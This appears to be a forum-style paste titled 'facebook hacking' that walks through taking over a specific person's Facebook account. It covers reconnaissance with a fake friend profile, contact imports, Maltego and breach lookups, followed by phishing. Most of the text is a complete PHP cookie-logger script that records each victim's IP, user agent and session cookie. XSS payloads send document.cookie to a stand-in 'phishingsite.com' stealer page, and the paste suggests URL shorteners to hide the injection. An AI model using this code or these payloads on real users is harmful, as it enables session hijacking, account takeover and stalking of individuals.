F:

1. Now we are going to talk about "facebook hacking"
2. We start talk about attack types that we CANT do:
3. Just forget about sqli and malware..
4.  
5. The easiest way and realistic to get a users facebook password is to Social engineer or Phishing.
6. And that's what we are going to talk about today.
7.  
8. So lets break down the Social Engineering steps.
9. First off you want to harvest as much information of the target as possible.
10. Create a fake Facebook account and add the target as friend and collect all info you need.
11. Open a yahoo email and import contact from Facebook, if you're lucky, hes email will leak.
12. Use google and maltego to find accounts associate with him,
13.  
14. If you found any email, look it up on haveibeenpwd.
15.  
16. If you have not found any password yet, i would go for Phishing.
17. If you have not read my report on xss, you need to do that now.
18.  
19. Use the cookie hijacking as explained in the xss tour
20. And ho knows, you might be able to find a XSS vuln on Facebook, this you haft to find on your own..
21. None will ever share that xss vuln with you
22.  
23.  
24. If you missed my xss writeup on cookie hijack
25.  
26.  
27. Cookie hijacking:
28. Put cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
29. The rest will script handle
30.  
31. cookielogger.php
32. <*?php
33.  
34. function GetIP()
35. {
36. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
37. $ip = getenv("HTTP_CLIENT_IP");
38. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
39. $ip = getenv("HTTP_X_FORWARDED_FOR");
40. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
41. $ip = getenv("REMOTE_ADDR");
42. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
43. $ip = $_SERVER['REMOTE_ADDR'];
44. else
45. $ip = "unknown";
46. return($ip);
47. }
48.  
49. function logData()
50. {
51. $ipLog="log.txt";
52. $cookie = $_SERVER['QUERY_STRING'];
53. $register_globals = (bool) ini_get('register_gobals');
54. if ($register_globals) $ip = getenv('REMOTE_ADDR');
55. else $ip = GetIP();
56.  
57. $rem_port = $_SERVER['REMOTE_PORT'];
58. $user_agent = $_SERVER['HTTP_USER_AGENT'];
59. $rqst_method = $_SERVER['METHOD'];
60. $rem_host = $_SERVER['REMOTE_HOST'];
61. $referer = $_SERVER['HTTP_REFERER'];
62. $date=date ("l dS of F Y h:i:s A");
63. $log=fopen("$ipLog", "a+");
64.  
65. if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
66. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
67. ");
68. else
69. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
70. fclose($log);
71. }
72.  
73. logData();
74.  
75. ?>
76.  
77.  
78. Make a tlog.txt and put both of them on your webspace and set "chmod 777".
79. Inject the following code in your target
80.  
81. website:
82. http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
83.  
84. <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
85.  
86. use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim